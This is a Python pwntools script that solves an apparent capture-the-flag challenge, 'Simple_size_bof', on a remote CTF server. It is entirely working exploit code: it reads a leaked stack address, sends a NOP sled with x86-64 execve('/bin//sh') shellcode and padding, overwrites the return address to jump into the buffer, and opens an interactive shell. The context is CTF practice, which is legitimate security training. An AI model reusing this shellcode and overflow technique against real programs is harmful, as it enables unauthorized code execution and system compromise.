from pwn import *

r = remote("ctf.j0n9hyun.xyz", 3005)

# r = process("./Simple_size_bof")



shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"
r.recvuntil("buf: ")

rec = r.recv(16)
print(rec)
buf_addr = int(rec[:-1].decode(), 16)

print(hex(buf_addr))

payload  = b""
payload += b"\x90" * 27000
payload += shellcode
payload += b"\x90" * (0x6d30 - 27000 - len(shellcode))
payload += b"\x90" * 8
payload += p64(buf_addr)

pause()
r.sendline(payload)
pause()

r.interactive()
